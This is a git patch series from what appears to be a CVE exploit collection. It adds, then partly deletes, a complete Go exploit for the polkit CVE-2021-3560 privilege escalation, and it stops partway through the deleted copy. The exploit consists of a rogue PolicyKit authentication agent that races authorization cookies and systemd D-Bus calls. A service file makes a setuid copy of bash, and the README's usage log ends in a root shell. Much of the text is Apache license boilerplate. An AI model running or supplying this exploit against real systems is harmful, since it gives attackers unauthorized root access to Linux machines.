no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + Copyright 2022 Ricter Zheng + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/README.md b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/README.md new file mode 100644 index 00000000..1f2111d1 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/README.md @@ -0,0 +1,40 @@ +PolicyKit CVE-2021-3560 Exploit (Authentication Agent) +==== + +### Technology Details +Blog posts about this exploit : +- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt +- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation + +## Build & Usage +``` +nobody@test:/tmp/CVE-2021-3560$ go build +nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service +=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === +pid-267920 - [*] Registering PolicyKit authentication agent ... +... +pid-267915 - [-] Exploit failed, please try again +nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service +=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === +pid-267963 - [*] Registering PolicyKit authentication agent ... +pid-267963 - [*] Authentication agent main loop running ... +pid-267968 - [*] Registering PolicyKit authentication agent ... +pid-267973 - [*] Registering PolicyKit authentication agent ... +pid-267968 - [*] Authentication agent main loop running ... +pid-267973 - [*] Authentication agent main loop running ... +pid-267963 - [*] Starting systemd service 'pwnkit.service' ... +pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ... +pid-267973 - [*] Reloading systemd daemon ... +pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units' +pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a +pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files' +pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80 +pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon' +pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2 +pid-267958 - [+] File exists, popping root shell ... +pwned-5.0# id +uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup) +``` + +## License +Apache License diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/agent.go b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/agent.go new file mode 100644 index 00000000..c8fd629d --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/agent.go @@ -0,0 +1,96 @@ +package main + +import ( + "fmt" + "os" + "strconv" + "syscall" + "time" + + "github.com/godbus/dbus/v5" +) + +var PolicyKitName = "org.freedesktop.PolicyKit1" +var PolicyKitInterface = "org.freedesktop.PolicyKit1.Authority" +var PolicyKitObjectPath = "/org/freedesktop/PolicyKit1/Authority" +var PolicyKitAgentInterface = "org.freedesktop.PolicyKit1.AuthenticationAgent" +var PolicyKitAgentObjectPath = "/org/freedesktop/PolicyKit1/AuthenticationAgent" + +type Subject struct { + Type string `dbus:"s"` + Data map[string]dbus.Variant `dbus:"a{sv}"` +} + +type Identity struct { + Type string `dbus:"s"` + Data map[string]dbus.Variant `dbus:"a{sv}"` +} + +type Agent struct { + Conn *dbus.Conn + Authority *dbus.BusObject + Subject *Subject +} + +func Logging(format string, a ...interface{}) { + format = "pid-" + strconv.Itoa(os.Getpid()) + " - " + format + "\n" + fmt.Printf(format, a ...) +} + +func (agent Agent) RegisterAgent() { + Logging("[*] Registering PolicyKit authentication agent ...") + + call := (*agent.Authority).Call(PolicyKitInterface+".RegisterAuthenticationAgent", 0, + agent.Subject, "en_US.UTF-8", PolicyKitAgentObjectPath) + + if call.Err != nil { + Logging("[-] Error while registering authentication agent: %s", call.Err) + os.Exit(2) + } +} + +func Kill(pid int) { + time.Sleep(time.Millisecond * 10) + syscall.Kill(pid, syscall.SIGKILL) +} + +func (agent Agent) BeginAuthentication(action string, _ string, _ string, _ map[string]string, + cookie string, identities []Identity) *dbus.Error { + Logging("[+] Received authentication request for action: '%s'", action) + Logging("[*] Cookie: %s", cookie) + + go Kill(os.Getpid()) + go (*agent.Authority).Call(PolicyKitInterface+".AuthenticationAgentResponse2", 0, + uint32(os.Getuid()), cookie, identities[0]) + time.Sleep(time.Millisecond * 1) + return nil +} + +func (agent Agent) StartAgent() { + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + // setup + agent.Conn = conn + agent.Subject = new(Subject) + agent.Subject.Type = "unix-process" + + agent.Subject.Data = make(map[string]dbus.Variant) + agent.Subject.Data["pid"] = dbus.MakeVariant(uint32(os.Getpid())) + agent.Subject.Data["start-time"] = dbus.MakeVariant(uint64(0)) + + // set authority + obj := agent.Conn.Object(PolicyKitName, dbus.ObjectPath(PolicyKitObjectPath)) + agent.Authority = &obj + + // export methods + mapping := make(map[string]string) + mapping["BeginAuthentication"] = "BeginAuthentication" + agent.Conn.ExportWithMap(agent, mapping, dbus.ObjectPath(PolicyKitAgentObjectPath), PolicyKitAgentInterface) + agent.RegisterAgent() + + Logging("[*] Authentication agent main loop running ...") +} diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/exploit.go b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/exploit.go new file mode 100644 index 00000000..74e80c0f --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/exploit.go @@ -0,0 +1,156 @@ +package main + +import ( + "fmt" + "os" + "os/exec" + "path/filepath" + "strings" + "syscall" + "time" + + "github.com/godbus/dbus/v5" +) + +var SystemdName = "org.freedesktop.systemd1" +var SystemdInterface = "org.freedesktop.systemd1.Manager" +var SystemdObjectPath = "/org/freedesktop/systemd1" + + +func Banner() { + fmt.Println("=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===") +} + +func Fork() { + attr := &syscall.ProcAttr{ + Env: os.Environ(), + Files: []uintptr{os.Stdin.Fd(), os.Stdout.Fd(), os.Stderr.Fd()}, + } + args := append(os.Args, "1") + go syscall.ForkExec("/proc/self/exe", args, attr) +} + +func main() { + if len(os.Args) == 2 { + Banner() + } + if !strings.HasSuffix(os.Args[1], ".service") { + Logging("[-] Unit file must end with .service") + os.Exit(3) + } + + abs, err := filepath.Abs(os.Args[1]) + if err != nil { + Logging("[-] Unit file status error: %s", err) + os.Exit(3) + } + + if len(os.Args) <= 4 { + Fork() + } + + var agent Agent + + if len(os.Args) != 2 { + go agent.StartAgent() + time.Sleep(time.Millisecond * 500) + } + + if len(os.Args) == 3 { + go MethodCallStartService(filepath.Base(abs)) + } else if len(os.Args) == 4 { + go MethodCallEnableUnitFiles(abs) + } else if len(os.Args) == 5 { + go MethodReload() + } else { + for i:=1; i<5; i++ { + time.Sleep(time.Second) + if _, err := os.Stat("/usr/local/bin/pwned"); err == nil { + Logging("[+] File exists, popping root shell ...") + cmd := exec.Command("/usr/local/bin/pwned", "-p") + cmd.Stdin = os.Stdin + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Run() + os.Exit(0) + } + } + Logging("[-] Exploit failed, please try again") + os.Exit(1) + } + + select {} +} + + +func MethodCallStartService(ServiceName string) { + Logging("[*] Starting systemd service '%s' ...", ServiceName) + conn, err := dbus.ConnectSystemBus() + defer conn.Close() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + call := bus.Call(SystemdInterface+".StartUnit", 4, ServiceName, "replace") + if call.Err != nil { + Logging("[-] Error for starting systemd service: %s", call.Err) + } +} + +func MethodReload() { + Logging("[*] Reloading systemd daemon ...") + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + message := CreateMessage(bus, SystemdInterface+".Reload") + call := conn.Send(message, make(chan *dbus.Call, 1)) + if call.Err != nil { + Logging("[-] Error for reloading daemon: %s", call.Err) + } +} + +func MethodCallEnableUnitFiles(ServiceName string) { + Logging("[*] Enabling systemd unit file '%s' ...", ServiceName) + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connection system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + message := CreateMessage(bus, SystemdInterface+".EnableUnitFiles", []string{ServiceName}, false, true) + call := conn.Send(message, make(chan *dbus.Call, 1)) + if call.Err != nil { + Logging("[-] Error for enabling unit file: %s", call.Err) + } +} + +func CreateMessage(obj dbus.BusObject, method string, args ...interface{}) *dbus.Message { + iface := "" + i := strings.LastIndex(method, ".") + if i != -1 { + iface = method[:i] + } + method = method[i+1:] + msg := new(dbus.Message) + msg.Type = dbus.TypeMethodCall + msg.Flags = dbus.FlagAllowInteractiveAuthorization + msg.Headers = make(map[dbus.HeaderField]dbus.Variant) + msg.Headers[dbus.FieldPath] = dbus.MakeVariant(obj.Path()) + msg.Headers[dbus.FieldDestination] = dbus.MakeVariant(obj.Destination()) + msg.Headers[dbus.FieldMember] = dbus.MakeVariant(method) + if iface != "" { + msg.Headers[dbus.FieldInterface] = dbus.MakeVariant(iface) + } + msg.Body = args + if len(args) > 0 { + msg.Headers[dbus.FieldSignature] = dbus.MakeVariant(dbus.SignatureOf(args...)) + } + return msg +} diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.mod b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.mod new file mode 100644 index 00000000..9e06b1f1 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.mod @@ -0,0 +1,5 @@ +module CVE-2021-3560 + +go 1.13 + +require github.com/godbus/dbus/v5 v5.1.0 diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.sum b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.sum new file mode 100644 index 00000000..7538a956 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.sum @@ -0,0 +1,3 @@ +github.com/godbus/dbus v4.1.0+incompatible h1:WqqLRTsQic3apZUK9qC5sGNfXthmPXzUZ7nQPrNITa4= +github.com/godbus/dbus/v5 v5.1.0 h1:4KLkAxT3aOY8Li4FRJe/KvhoNFFxo0m6fNuFUO8QJUk= +github.com/godbus/dbus/v5 v5.1.0/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/pwnkit.service b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/pwnkit.service new file mode 100644 index 00000000..76435650 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/pwnkit.service @@ -0,0 +1,9 @@ +[Unit] +Description=Super Secure Shell +AllowIsolate=no + +[Service] +ExecStart=/bin/bash -c '/usr/bin/cp /bin/bash /usr/local/bin/pwned; /usr/bin/chmod +s /usr/local/bin/pwned' + +[Install] +Alias=pwnkit.service -- Gitee From 4092bd24181f782ed47c2c78f9c8570248c672ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:30:39 +0000 Subject: [PATCH 6/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache/2021/CVE-2021-3560/CVE-2021-35601?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2021/CVE-2021-3560/CVE-2021-35601/LICENSE | 190 ------------------ .../CVE-2021-3560/CVE-2021-35601/README.md | 40 ---- .../CVE-2021-3560/CVE-2021-35601/agent.go | 96 --------- .../CVE-2021-3560/CVE-2021-35601/exploit.go | 156 -------------- .../2021/CVE-2021-3560/CVE-2021-35601/go.mod | 5 - .../2021/CVE-2021-3560/CVE-2021-35601/go.sum | 3 - .../CVE-2021-35601/pwnkit.service | 9 - 7 files changed, 499 deletions(-) delete mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-35601/LICENSE delete mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-35601/README.md delete mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-35601/agent.go delete mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-35601/exploit.go delete mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.mod delete mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.sum delete mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-35601/pwnkit.service diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/LICENSE b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/LICENSE deleted file mode 100644 index d1828ea2..00000000 --- a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/LICENSE +++ /dev/null @@ -1,190 +0,0 @@ - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - Copyright 2022 Ricter Zheng - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/README.md b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/README.md deleted file mode 100644 index 1f2111d1..00000000 --- a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/README.md +++ /dev/null @@ -1,40 +0,0 @@ -PolicyKit CVE-2021-3560 Exploit (Authentication Agent) -==== - -### Technology Details -Blog posts about this exploit : -- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt -- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation - -## Build & Usage -``` -nobody@test:/tmp/CVE-2021-3560$ go build -nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service -=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === -pid-267920 - [*] Registering PolicyKit authentication agent ... -... -pid-267915 - [-] Exploit failed, please try again -nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service -=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === -pid-267963 - [*] Registering PolicyKit authentication agent ... -pid-267963 - [*] Authentication agent main loop running ... -pid-267968 - [*] Registering PolicyKit authentication agent ... -pid-267973 - [*] Registering PolicyKit authentication agent ... -pid-267968 - [*] Authentication agent main loop running ... -pid-267973 - [*] Authentication agent main loop running ... -pid-267963 - [*] Starting systemd service 'pwnkit.service' ... -pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ... -pid-267973 - [*] Reloading systemd daemon ... -pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units' -pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a -pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files' -pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80 -pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon' -pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2 -pid-267958 - [+] File exists, popping root shell ... -pwned-5.0# id -uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup) -``` - -## License -Apache License diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/agent.go b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/agent.go deleted file mode 100644 index c8fd629d..00000000 --- a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/agent.go +++ /dev/null @@ -1,96 +0,0 @@ -package main - -import ( - "fmt" - "os" - "strconv" - "syscall" - "time" - - "github.com/godbus/dbus/v5" -) - -var PolicyKitName = "org.freedesktop.PolicyKit1" -var PolicyKitInterface = "org.freedesktop.PolicyKit1.Authority" -var PolicyKitObjectPath = "/org/freedesktop/PolicyKit1/Authority" -var PolicyKitAgentInterface = "org.freedesktop.PolicyKit1.AuthenticationAgent" -var PolicyKitAgentObjectPath = "/org/freedesktop/PolicyKit1/AuthenticationAgent" - -type Subject struct { - Type string `dbus:"s"` - Data map[string]dbus.Variant `dbus:"a{sv}"` -} - -type Identity struct { - Type string `dbus:"s"` - Data map[string]dbus.Variant `dbus:"a{sv}"` -} - -type Agent struct { - Conn *dbus.Conn - Authority *dbus.BusObject - Subject *Subject -} - -func Logging(format string, a ...interface{}) { - format = "pid-" + strconv.Itoa(os.Getpid()) + " - " + format + "\n" - fmt.Printf(format, a ...) -} - -func (agent Agent) RegisterAgent() { - Logging("[*] Registering PolicyKit authentication agent ...") - - call := (*agent.Authority).Call(PolicyKitInterface+".RegisterAuthenticationAgent", 0, - agent.Subject, "en_US.UTF-8", PolicyKitAgentObjectPath) - - if call.Err != nil { - Logging("[-] Error while registering authentication agent: %s", call.Err) - os.Exit(2) - } -} - -func Kill(pid int) { - time.Sleep(time.Millisecond * 10) - syscall.Kill(pid, syscall.SIGKILL) -} - -func (agent Agent) BeginAuthentication(action string, _ string, _ string, _ map[string]string, - cookie string, identities []Identity) *dbus.Error { - Logging("[+] Received authentication request for action: '%s'", action) - Logging("[*] Cookie: %s", cookie) - - go Kill(os.Getpid()) - go (*agent.Authority).Call(PolicyKitInterface+".AuthenticationAgentResponse2", 0, - uint32(os.Getuid()), cookie, identities[0]) - time.Sleep(time.Millisecond * 1) - return nil -} - -func (agent Agent) StartAgent() { - conn, err := dbus.ConnectSystemBus() - if err != nil { - Logging("[-] Error for connecting system bus: %s", err) - os.Exit(1) - } - - // setup - agent.Conn = conn - agent.Subject = new(Subject) - agent.Subject.Type = "unix-process" - - agent.Subject.Data = make(map[string]dbus.Variant) - agent.Subject.Data["pid"] = dbus.MakeVariant(uint32(os.Getpid())) - agent.Subject.Data["start-time"] = dbus.MakeVariant(uint64(0)) - - // set authority - obj := agent.Conn.Object(PolicyKitName, dbus.ObjectPath(PolicyKitObjectPath)) - agent.Authority = &obj - - // export methods - mapping := make(map[string]string) - mapping["BeginAuthentication"] = "BeginAuthentication" - agent.Conn.ExportWithMap(agent, mapping, dbus.ObjectPath(PolicyKitAgentObjectPath), PolicyKitAgentInterface) - agent.RegisterAgent() - - Logging("[*] Authentication agent main loop running ...") -} diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/exploit.go b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/exploit.go deleted file mode 100644 index 74e80c0f..00000000 --- a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/exploit.go +++ /dev/null @@ -1,156 +0,0 @@ -package main - -import ( - "fmt" - "os" - "os/exec" - "path/filepath" - "strings" - "syscall" - "time" - - "github.com/godbus/dbus/v5" -) - -var SystemdName = "org.freedesktop.systemd1" -var SystemdInterface = "org.freedesktop.systemd1.Manager" -var SystemdObjectPath = "/org/freedesktop/systemd1" - - -func Banner() { - fmt.Println("=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===") -} - -func Fork() { - attr := &syscall.ProcAttr{ 